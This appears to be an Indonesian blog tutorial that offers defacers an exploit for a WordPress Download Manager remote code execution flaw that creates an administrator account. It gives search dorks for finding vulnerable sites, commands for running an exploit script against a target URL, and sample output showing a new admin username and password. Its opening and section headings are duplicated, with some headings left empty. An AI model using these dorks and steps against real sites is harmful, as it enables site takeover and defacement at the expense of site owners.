Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)
https://tinyurl.com/
Naufal Ardhani - Halo gaes dah lama ga update artikel nihh kali ini saya bakal bagiin Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin), Cocok banget buat Defacer yang suka deface CMS Wordpress Exploit ini cukup mudah tapi cari targetnya yang males karna saya gasuka dorking -_- jadi ditutorial ini gapake livetarget dulu.
Sebelumnya bagi anda yang belum tau apa itu Remote Code Execution simak sedikit penjelasan dibawah,
Bahan :
Dork :
Step :
Sekian Artikel Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)
Sebelumnya bagi anda yang belum tau apa itu Remote Code Execution simak sedikit penjelasan dibawah,
Remote Code Execution (RCE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi. ( Sumber : FACEBOOK )
Bahan :
- Python ( Untuk Pengguna Windows yang belum terinstall python di cmd silahkan download dan install dulu )
- Script Exploiter ( Ekstensi : Python )
Dork :
- index of "download-manager"
- index of "download-manager" inurl:/wp
- index of "download-manager" inurl:/wordpress/
Step :
- Buka Terminal anda
- Open ke Directory dimana anda menyimpan Exploiternya ( kalau saya di Documents/doc/tools ) jadi commandnya : cd Documents/doc/tools/
- Sudah ketemu exploiter.py nya lalu jalankan dengan command : python exploiter.py
- Jika sudah mendapatkan taget langsung saja eksekusi dengan command : python exploiter.py -t http://www.site-target.com
SEKEDAR GAMBARAN JIKA BERHASIL
[!] Account Added
[!] Location: http://10.0.0.67/wordpress/wp-login.php
[!] Username: r7Uo4v
[!] Password: YN1G1F
Sekian Artikel Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)